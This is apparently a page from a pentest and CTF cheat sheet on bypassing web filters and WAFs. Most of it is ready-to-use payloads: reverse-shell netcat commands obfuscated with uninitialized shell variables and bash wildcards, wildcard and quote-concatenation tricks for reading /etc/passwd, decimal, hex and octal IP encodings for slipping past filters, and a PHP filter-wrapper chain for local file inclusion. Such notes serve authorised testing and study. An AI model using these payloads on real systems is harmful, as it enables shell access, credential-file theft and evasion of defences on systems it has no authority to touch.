Web Filter Bypass

Payloads and Bypass Methods for Web Filtering

LogoGitHub - swisskyrepo/PayloadsAllTheThings: A list of useful payloads and bypass for Web Application Security and Pentest/CTFGitHub
swisskyrepo / PayloadsAllTheThings
LogoHow To Exploit PHP RemotelySecjuice
How To Exploit PHP Remotely To Bypass Filters & WAF Rules

Use Uninitialized Shell Variables to Bypass Filters

LogoWeb Application Firewall (WAF) Evasion Techniques #3Secjuice
Web Application Firewall (WAF) Evasion Techniques #3

Uninitialized shell variables can be used for bypassing web application firewalls (WAF). Example: bypassing a filter to execute a reverse shell - nc$u -e /bin$u/bash$u <ip> <port>. If this doesn't work try adding spaces before and after the variable (note the +'s, this example is also URL encoded): nc+$u++-e+/bin$u/bash$u <ip> <port> ($u in this case is a random attacker-picked variable that would hopefully be uninitialized on the target).

Use Wildcards to Bypass Filters

LogoWeb Application Firewall (WAF) Evasion TechniquesMedium
Web Application Firewall (WAF) Evasion Techniques

Bypass web filters by using bash wildcards:/???/?s /?cmd=%2f???%2f??t%20%2f???%2fp??s?? will bypass...and execute every command that matches. such as /bin/cat /etc/apt, and /bin/cat /etc/passwd

netcat firewall bypass: /???/n? -e /???/b??h 2130706433 1337 (/???/?c.??????????? -e /???/b??h 2130706433 1337 for nc traditional)

Standard: /bin/nc 127.0.0.1 1337
Evasion:/???/n? 2130706433 1337
Used chars: / ? n [0-9]

Standard: /bin/cat /etc/passwd
Evasion: /???/??t /???/??ss??
Used chars: / ? t s

Use String Concatenation to Bypass Filters

$ /bin/cat /etc/passwd
$ /bin/cat /e'tc'/pa'ss'wd
$ /bin/c'at' /e'tc'/pa'ss'wd
$ /b'i'n/c'a't /e't'c/p'a's's'w'd'
Can use \\ instead of ' as well

Convert IP Address to Other Formats

It is still understood by most programs and languages when converted to other formats, such as decimal, and avoids . character in filtered HTTP requests: 127.0.0.1 = 2130706433

http://127.0.0.1

#0 Concatenation
http://127.0.1
http://127.1

#Decimal
http://2130706433

#Hexidecimal
http://0x7f000001

#Dotted Hexidecimal
http://0x7f.0x0.0x0.0x1
http://0x7f.0x000001
http://0x7f.0x0.00x0001

#Others (need descriptions)
http://0177.00.00.01
http://000000177.0000000.000000000.0001
http://017700000001
http://%31%32%37%2e%30%2e%30%2e%31
http://127.0x0.000000000.0x1
http://①②⑦.⓪.⓪.①

Injecting IPs when . is disallowed: convert dotted-decimal format to decimal value - ip2dh

LFI / RFI by Bypassing Filters Using Wrappers

From PayloadsAllTheThings php://filter/ has multiple ways to bypass PHP input filters ;These can be chained with | or / : zip, data, expect, input, phar; many more different wrappers to try!

/zlib.deflate/read=string.rot13/convert.base64-encode/convert.iconv.utf-8.utf-16/resource=<resource to get>

PreviousEnumerationNextCommand Injection

Last updated